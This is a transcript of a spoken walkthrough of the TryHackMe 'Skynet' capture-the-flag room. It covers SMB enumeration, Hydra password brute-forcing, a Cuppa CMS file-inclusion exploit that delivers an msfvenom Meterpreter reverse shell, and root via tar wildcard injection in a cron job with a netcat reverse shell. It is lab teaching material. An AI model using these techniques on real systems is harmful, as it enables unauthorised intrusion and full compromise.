Hey everybody, welcome to the walkthrough for Skynet on TryHackMe. For today's box, it's a Terminator themed box. In this room, you can see that they're not providing too much information for each task or question. And this is kind of getting you started to more think on your own and be less guided. They do ask for certain key questions to kind of guide you in the direction of things that you need. So let's get started with this room. So we have the box started. We'll go ahead and copy the IP address here. And then we'll add this to our targets file. Again, our targets file allows us to keep on scope for when we're doing scanning. So with that done, we'll do an nmap-il for input list and targets-oa output all formats. We'll call this a init scan and do a-t5. Oops, little o. So some services come back right away. We got SSH, port 80, POP3, NetBIOS, IMAP, and Microsoft DS or SMB. So let's see a more detailed type scan on these. So again, we're just changing that output all format to detailed scan, and we're going to add some more options. We're going to do a -a-o, little s big V for service version, and then script. So this will run the nmap scripting engine after it finds the ports. We're going to do a version and vol. So while that's running, let's enumerate those SMB ports while we're waiting. So we could use SMB map or enum for Linux. Let's do both, right? So if we do SMB map, do -h, put in the IP address. It's gonna do a guest session to there, and we have some information here, right? So we have an anonymous, and we can read only on that, and then we have a Miles Dyson with no access, and then the two $ drives, which usually require an admin type privilege. So let's also run enum for Linux on this host. See if we get out any information. So we do get that this is called Skynet. It is part of a work group. See, that's part of a work group here. So this is a single computer. We are able to authenticate using a blank username and password. That's kind of the same way that we did it with SMB map there. And then we also did find a user, Miles Dyson. So we've got two scans going. Let's go ahead and look at that drive that we found earlier and see if there's anything on there. So to mount a drive, you can mount a remote drive by doing mount -t CIFS, common internet file system. We'll do // the IP address, and the drive's name was anonymous. And then we need to specify a location. So you need to have created this directory beforehand. So that's going to mount that directory. It's going to ask us for a password that, again, it was blank. We saw that earlier. And then this is already mounted. So if we ls this, share, we can see that there's files in here. We can look at the files more in depth. So two files, two big files will stick out we see an attention here in the main directory. We see a bunch of books. Maybe we look at those books for metadata if none of this panned out. And then we have a log1.txt. Again, we're only looking at the log1 because of this is the only file that had some kind of byte count. So let's look at the first one, the attention.txt. So we're going to do that via cat mount share and then attention. And in there we see a recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this. Miles Dyson. Okay, cool. And then let's look at the logs one. So the log one looks like a bunch of names or passwords maybe. So let's save that for later. Might be useful. So now we've copied that over to our local directory. And we can see that that's there. All right, so we're still scanning some things. So what enum for Linux is doing is it's walking through all possible user IDs, RIDs and SIDs, and seeing if we can find any additional users that were not listed. So we'll see stuff like built-in administrators, users, guest, anything like that. And nmap's almost about done. So once this gets done, we'll see what it has to come out with. Another thing we could go do while we're waiting is we could run a GoBuster on this system. Let's get that going. So GoBuster, or actually let's look at the website. We didn't even look at the website yet. So looking at the website, we see that it has some kind of search functionality here. Make this a little bigger. If we type in anything, it just kind of puts us back to the main page. If we look at the source code for this page, we see that it's just going to the pound sign, which is usually the same page, using a post method. So this page is not doing anything. It doesn't have any JavaScript or anything like that. So this page is kind of useless. It's really not going anywhere. Let's see if the scanning's not done yet. All right, so then we'll do a GoBuster. So GoBuster. And what we're looking for is any other hidden directories that we, are not seeing here. We'll specify word list, user, word list, user share word list. And then we're going to do threading. We're going to put that up to 15 and we'll save our output. So we'll see if GoBuster comes up. We did get an admin page. So we could try that admin page while we're waiting. Okay, so we get a forbidden denied on that. There's a config page, so let's look at that config page. Forbidden on that one too. AI. So again, we're just looking for something different to log into. We did get those potential. We have a user. We have some passwords. We could also try it. Let's do brute forcing um, with those. So while that's still running, we'll open up another terminal underneath here. We'll do Hydra to kind of brute force that login. So L Miles Dyson, and we got that from enum from Linux. Here we have a drive for Miles Dyson. There was also the user right here, Miles Dyson. Nmap finished too, so we'll just look at that here in a minute once we get Hydra running. And then big P, we're going to use that log one, and then we just need to specify SMB, the IP address for it. And we'll want to basically mount that guy's drive, Miles Dyson. That looks like that should be everything. So that's going to try that, and let's look at our nmap results. All right, so nmap, more detailed came back. Now we know the version. We know we're dealing with OpenSSH 7.2 P2. So yeah, it would be good to kind of go look to see if that's an older version of SSH. Does it have any vulnerabilities? Same thing with Apache 2.4.18. We did get some directories here, and that's something we'll want to try here in a second. We did get a list of CVEs, so looking at each one of these CVEs and seeing if that would allow for remote code execution or anything like that. We did see the mail services, so we could try to log into the mail services, and then the SMB ports, which we're already banging on the SMB ports with the tools that we got going. All right. We did see that Now Go Buster is picked up on that squirrel mail, which also was picked up right here by nmap. So 2 hits. Let's see what that gives us. So we have a login page. We should try default creds. So we could do an admin. See if that comes back with anything. It does not. We do notice that it did send us to a redirect page. So we could look at this website and make sure this is doing something. So we see here that the form action is to send a redirect, so that is some kind of action instead of like the last page. We do see an input of a login username and an input of a secret key, and then a JS auto detect results equals 0 and a just logged in equals 1. So let's try brute forcing this too. We see Hydra didn't find anything on the SMB port there. So we'll just we'll use the same username, same password list, and then we're just going to now change what we're attacking. So we're going to do a 1010 201.117, and this is going to be an HTTP post, form post, or post form. And we need to specify that location. This is going to be redirect because that's where it's going to send the post parameters, redirect.php. So for Hydra, you specify the location first, and then you specify the variables. So we're doing a login underscore username, and then we're doing user. And so what Hydra's doing is looking to replace user with whatever's in the -L. If this was a big L, it would take in a list and then start replacing it here. And then so as parameters, you would see in a post request login name equals username, and then secret key equals pass, and we have that JS auto detect. Make sure we're doing this right. Equals 0, and just logged in equals 1. Okay, so that's all the post parameters that we saw there. And then we need to specify the error message when this doesn't work. So we saw before when we logged in incorrectly, it gives us an error, unknown user or password incorrect. So we'll just use that last word, password incorrect. You could also verify this is the correct, all the parameters that you needed by sending this login page to Burp, and it would show you all that, or some kind of HTTP proxy. You'd want to see that. So with that set up, we'll go ahead and kick that off. And we got a hit. So we got a couple hits apparently. So we'll try the first one. And we're logged in. So now we have access to his emails, and we want to see what what he has in here. So we have this email here, just kind of looks like some gibberish. We have this binary stuff. We could put this through and see if this actually comes out to be anything. And then we have this email here. This one that talks about that password. And if you remember from our earlier notes, they were saying all SMB passwords were changed. So this is a good password. So with that now, we have two new passwords. We have that Cyborg00 Halo Terminator, and we have that SMB password that we got. So we could try to do SSH or anything like that. I'm gonna go ahead and kill GoBuster since we don't need it. We found something from there. What we'll try to do first is log in as a SMB share, because again, if we can get some kind of SMB foothold and there's something in there, then that'll help us out more than or equivalent to if we had SSH. So first we could try SSH. So we can do Miles Dyson at 1010 201.117, and we're going to paste in that password. Okay, that password didn't work, so we'll try the other one. Cyborg007 Halo Terminator. That one didn't work either, so that's fine. We could also go ahead and add that password to that list and have Hydra sit there and brute force it while we're working on other stuff. So let's do that real quick. We'll edit log one. We'll go down to the bottom here. We'll paste in that password, save it, and we'll set Hydra to do this now. So let's clear that out. And we just need for SSH All right, so that should be brute forcing that. And it didn't find anything. So it didn't find any of those passwords. Let's do SMB now. Zero passwords found. Okay, so let's also try to do SMB map and see if we get anything from that. So we do have the username, Miles Dyson, and then we do have the password. For the host, we need to put the host IP address. All right, so this gave us more access we see here. So again, it's good to use different tools to see um, if something happens. Hydra might interpret these characters differently than when we put it in SMB map. So something to just be aware of. So now that we have access to that, let's mount his drive and see what we have here. So we need to first unmount our previous drive, and so we just do an unmount and then share, or umount, sorry. And now we're just gonna mount that share. So mount -t cifs / 10 10 201 117. We're gonna go for that Miles Dyson. And now that we're trying to log in as a user, you need to tell mount that. So we need to do a -o and specify the user equals Miles Dyson. It'll ask us for the password after. And then /mount /share. So we're pasting in that same password from up here without the quotations, of course. Push enter, and now we should have his drive mounted. We're going to do the same format that we did last time, just an ALR /mount /share, and see what comes out of this. All right, so we have more PDFs, a notes directory, and then in the notes we see some markdown files and an important .text. So let's go with the one that stands out, which is the important .text. So count mount share notes important .text. Add feature to beta CMS /45KR24ZXS yada yada yada. Work on T800 model 101. Spend more time. So this is kind of pointing us to that there's a directory that we did not find before. So if we go back to our web page now, we do get this other page. And if we look at the source here, there's no real indication of anything that this is some other type of directory or format or whatever. But let's do a Go Buster on it. So see if we can find our Go Buster. Actually, no, that was over here. Okay. All right, so we're going to do go buster. That's going to be new directory. We also need to specify that new directory that we found. Get that going. All right, while that's scanning, let's look back to see if there was anything else that kind of gave us clues. We had looked at all the ports and things like that, so that's good there. The looking for additional users finished up. So it looks like the main user that we got was Miles Dyson. There was no printers or anything like that. So enum for Linux looks like it got complete there. Oh, so we did pull out another administrator page. Oops. So let's see what that pulls up. All right, so now we have some kind of software, Cuppa CMS, and he mentioned CMS in that other notes. So again, we could try a default admin, um, user. We do see the page kind of reloading, doing stuff. Let's look at the page source, make sure that it is actually doing anything. We do see a lot more type information here, templates, things like that. So this looks like an actual legitimate page, not something that wasn't going anywhere. For the form, we see that it is a post. It is taking an input of a user and a password, but this is not really giving us an idea where that's posting that to, and that's probably because it's in the JavaScript. So usually something like this, when it doesn't have where to go, is loading it via some other way. So we could pump this through burp and then brute force it using Hydra, see if we can get something that way. We could also look at see if there's any identified vulnerabilities with this. So we could look up search exploit. And we do get one. We get a Cuppa CMS. So you want to copy this over, you just do a -m. It's going to copy it to that current directory. And it needs the ID, and usually the ID is this number here. So I'm holding down Control Shift C to copy, and then Control Shift V to paste. And so that's going to copy it from user share exploit DB exploits PHP web apps text file to my current directory. So now we'll see that file is here. So let's see what this file is, what it holds. What does the exploit look like? So this exploit, like most exploits on ExploitDB, are written by authors, and they can do style encoding however they want. So this is their header, it looks like. And then they're pointing out the vulnerability is in alerts config field PHP on line 22. And that line here basically includes anything from the request with the parameter URL config and just runs it in that page without any context. So this is a big no-no. We're basically taking user input and executing on it without evaluating it, without filtering it or anything like that. And so in this case, it does allow for a local and a remote PHP file include. So we can see here, one of the ways to test this is that we could do target Cuppa alerts, alert config, PHP URL config, and then etc password. So this will be a local file include. This is basically dropping down several directories to the main file system. So you put this in to kind of work your way back down to the directory, and then it's going into etc and password. So let's copy this and see if we can get this running up here. So administrator, and then so that didn't work. So what I normally do then, if it's something where it's files, I'll just start deleting the first directory and start working down. Especially in this case here where it's saying it's Cuppa, that Cuppa directory could be wherever they decide to install it. So deleting that and then going to the next one and pushing enter, we do get some kind of feedback now. And this looks exactly like an etc password file, except it would be long format instead of not word wrapped. And so we know that we have this vulnerability on this server, and what we'd like to do is get our own shell running on this. So there's a couple things that we know about this server now. We know that it's PHP. We know that it will call back because it told us it had a remote file include. So let's go ahead and start generating up and setting that up. So we're going to get a clear screen here. And we're going to, I like to catch my shells with Metasploit. So I'm going to run msdb run. We'll go ahead and split the terminal too because we're going to need to generate the payload. So once this gets running, all right, so when you're just catching shells, you'll use the exploit multi-handler. And we need a payload, right? So we know that there's PHP running there, so we could search PHP. We'll specify our type as payload. And there's several of them. We could do, usually you want to do a reverse. You want something to call you back. So we have some binds here. We don't want those. We can have it download and execute something. We don't want to use that right away. Some more binds. There's a reverse TCP with interpreter, reverse TCP UUID, reverse TCP. So we got a stager and then a not stager. Reverse Perl and just a plain reverse PHP. So let's just do interpreter reverse. So we're going to use that one there. So after you do a search, you can use those numbers there. So you can use when you do a search for something else, but when you're setting this, it will mess it up. So set payload. Let's try 13. Oh, will it work? No, that didn't work. So we need to set the payload and just specify the payload. That'd be a cool feature if that did that. So set payload. Okay, yes, all right. And then we need to set our lhost. Ton 0. And another thing I like to do is set exit on session false so that whenever we do catch the shell, we don't lose it in this case here. And then exploit -j, that's going to put that job in the background. And so now this is waiting to catch our shell. So if we do jobs-v, we see this here. So we need to generate this shell now, right? So we can use MSF Venom -p. The payload is going to be the exact payload that you just did up here. We need to do an lhost equals and then an lport. And we're going to do this, the file type will be raw, so -f raw. And we're going to pipe that to revmet php. So MSF in the background is generating the payload, assigning those variables, and then going to generate the PHP file. So let's look at this PHP in Visual Studio. So one of the things that it ends up doing is it likes to add the comments in front of the PHP file. And then also at the end of it, you'll need to close your PHP tag so that this will run. So what this is basically doing, there we go. Assigning the IP address, there's the port number, then assigning a stream client socket, then using those variables in here, opening up a stream, and then doing an fsocket open, calling those files into the stream. And so it's just basically kind of creating the stream and piping in input from that address into a command to run on the system. So we'll want to save that. And then we need to now host this file so that the web server can call us. So we'll do a Python 3-m http server. Okay, so everything's kind of set up now to get this. So we have our listener. This could also have been netcat. So we could set up netcat. We wouldn't have used Meterpreter for the payload. Um, we would have used, just the regular PHP reverse TCP or Pentest Monkey's reverse PHP shell. That's another one. But it's basically the same kind of concept. It just has an IP address and a port number that you edit and then, get it to run. We need a web server so that their web server can call to our web server to download the file, and then it's going to execute it via that PHP include. So with this all set up, let's get this going now. So we'll take this out. We'll do, and we need our IP. Oh, yeah, which is right here. And we're going to be on port 8000, so we can't forget that. And that's going to be revmet php. Okay, so that should be right. We have revmet.php. It's calling our server. We push enter here now. We see that it pulled the PHP file, and then we got the Meterpreter session up here. So now we have a Meterpreter session. So we can see we are www data, which is okay. We got a session now, so we need to escalate that session further. So one of the scripts I like to use is linps, and so we could copy linps into here so that we could use it. Or since we have Meterpreter, we could just upload that too. So let's go ahead and kill our web service here, so we're just not running that. Let's go ahead and locate linps. We'll exit this right now. So limpes is in opt, and then privilege escalation suite, limpes, and there it is, limpes.sh. So let's jump into our session. -I for interactive, 1 for the session number. We can see what we again are. We know we're dub data based on interpreter replying that. And we want to put this file somewhere. So if we ls the current directory, we're in that var www html 45 directory administrator alerts. The location basically where that PHP include was at. Let's not upload there. Let's upload it to dev shm. Kind of stay a little bit more hidden. So now we're going to upload. We're going to copy that directory here. So this is going to read it from our local file and then paste it onto that remote file there. So that's uploaded, and next thing we'll do is we'll need to run it. So we can do a shell, and you don't get a prompt here, and this sometimes will confuse people. You are in a shell. There's just no prompt. So if you do an ls, you'll see a response back, and that's kind of how you know that you're in a shell. So if we do an ls all files long listing, we can see that that's the only file in this directory. We need to make this executable, so we'll do a chmod +x linps. And so since we are in this shell that doesn't really give us much response back, what I would do then for this for linps is just output it to a directory so that we can pull that information back and then review it. So we're going to execute linps.sh, pipe that into an output.txt, and then semicolon. So this basically is one Linux command, and then we're going to run a Linux command after this. And this is just so that we know when this command is done. So we'll do this ls-all. So we'll know when this command's done. So this is running in the background. All right, and so now we got output. So now we know this is done. We need to download this file. So because we have an interpreter, we can do a Control-C. That's going to terminate the channel, not the shell. And we'll say yes, terminate that channel, and we'll get back to our interpreter session. So we'll want to download that output file and get it onto our host system here. So let's see, let's do a download -h. That'll tell you all the options with that. And we want to basically put the destination. So we'll need to download that, right? And so we'll download output.txt, and we're going to save that into our Skynet directory here. All right, so now that's on our box. So if we look at this, we can cat the output, and we still get all the same color formats and everything like that that we would normally get. So if you never used limpes before, one of the great features is that coloring. It kind of highlights things, what to focus in on. Again, they're not 100%, that's the way to do this every time, but it kind of gives you what to start with first when you're looking at things. So The legend here says, red, yellow is 99% a privilege escalation vector. So we see some basic information, some system stuff, some environment variables here, devices, available software. So this is good to look at too, so that you can research GTFO bins. So we've got netcat, we got wcurl, wget, curl, ping, gcc, so we could compile stuff if we needed to, sudo, php, perl. We see things are running as root. There's a MySQL database there. Some binary processes permissions. And then it looks like we got into cron jobs. And so the first high privileged escalation that we see here is this cron job running as root and running in the home miles backups directory. So if we'll take a look at this one first. We still have an interpreter session up here, so we can cat that file and see what's inside there. And so catting that file, what we see is it's a bin bash script. It's cding into var www html and then running a tar command. So that's an interesting aspect of that. So let's look at some research. Staying up to date on things and reading about different ways of doing privilege escalation will kind of get you to realize some things and tricks and stuff that happens in the industry. And so there was a trick, there was a thing that happened with tar at one time that would allow you to privilege escalate. And so reading this article here, the hackingarticles.in, we can scroll down. We see there's some examples here, and what we're looking for is priv. And they're kind of setting us up a little bit here. So we see that there's a cron tab, and it runs a job. And if we generate a reverse netcat command line, we could echo that into a, let's see here, file called shell.sh, and then make sure that these additional files are in that same directory, the dash dash checkpoint dash action equals exe equals sh shell, and dash dash checkpoint equals 1. And so what happens is tar, the bash script is running those commands. It's going to run, it's going to change into that directory. It's going to then run tar. Tar is going to see that there's these options in here. And the first one it sees is the checkpoint 1. So it's going to do show progress message every numbers record. And then it sees also there's a checkpoint action. So basically the checkpoint is each file, 1. And then because of each file, we need to do an action. And in this case, the action is to do a shell sh and then run shell. So this is running the shell.sh. So this seems like a good privilege escalation that we want to do. So we'll go ahead and start working this up. So we can see we can generate it again using MSF Venom. I like to catch my shells with Metasploit. It makes it so that if I need to exit out of them, we have that ability. So let's go ahead and set up everything as much as possible here. All right, so we still got Interpreter open here. We'll background that. Clear this out. All right, so we're gonna do, we want to catch the shell. We know it's a reverse netcat, so we're gonna set payload, and based on that article, we want a command Unix reverse netcat. So cmd Unix reverse underscore netcat. If we show options, we still have the same L listing host. We need a different port, so we'll set L port to be different. And We're going to unset that exit on session this time. So if we do an exploit -J on this, apparently we need to have that set. So we'll just set this to false. Our exit session true. Okay, so now we have that. So if we look at our jobs -V, we have 2 up there. So now we need to generate the actual command that we do. So we could do an nmsf venom -p payload. lhost equals 10.11.0.14. lport is going to be equal 55555. And we want to just basically let the raw command. So it's just going to be, because we're doing a command, it's just going to put it out on the terminal. Okay, so if you've never seen netcat and piping and stuff like that, this is what this is doing. So it's making a file in, file out in temporary, this file, and then it's running netcat to connect to my IP on this port number, and then it's sending any input from that into that temp file there. And then we're piping the output of that into bin sh to temp that file, and we're squashing any errors with this command here, and then we'll remove that file when we're done, basically. So it's just basically piping any input from what we put in netcat to that file and then executing it via bin sh, if that makes sense. So we'll need this command here. And we're going to have to use our session on the box that we had. So since that backup script runs out of the var www, that's the directory we need to be into. So var, oops, cd var www-html. So we're now in that directory. We can see there. So we're gonna go ahead and start writing these files based on that. So we're gonna echo the command. We're gonna pipe that into shell.sh. And then we need to do those option commands based on what we're seeing here. So we need to have the -- checkpoint action exe sh shell.sh, and the checkpoint equals 1. So I'm just gonna do touch. Gives me a little bit more of just having that there. So we need to specify the directory, and then the file name. Okay, and then we need to also do the other one. Okay, and so then that should be everything. If we do an ls-al, we'll see that those files exist there. There's the shell.sh, and next time that cron job runs, which shouldn't take too long, we should get a shell. And so we can see that we did get a shell. We got a shell called back already. And there's another one. There's the full part of that. Just didn't fully receive yet. So now we got the full shell. One of the things I like to do is upgrade this to interpreter. So we'll search from interpreter. We're going to do a type. Whoops. Type post. And we're going to use number 7 here. So use 7. Show our options. We just need to set a session, but we'll go ahead and set an lhost2 just to make sure. We just want to verify we want to upgrade session 2, so we're going to set session 2. So we should be able to run this, and it should be able to upgrade our session. So now if we see, doesn't look like we got it yet. There it is. So there's interpreter now. So if we do an interaction with 3, we see that we have interpreter. Seems like interpreter's a little slow. Might still be loading. If we load this shell now, we should be able to see who am I, and we are root. So now we are root. We have a shell that we can close in background and things like that. We should be able to then ls. There we go. So we got the root, and then we can go get the user flag also. So that should give you everything that you needed to successfully complete that box. We got Miles' password, we found the hidden directory, the vulnerability, and we talked about this, the user flag and the root flag. All right, thanks everyone. Hope that helps out, and see you next week.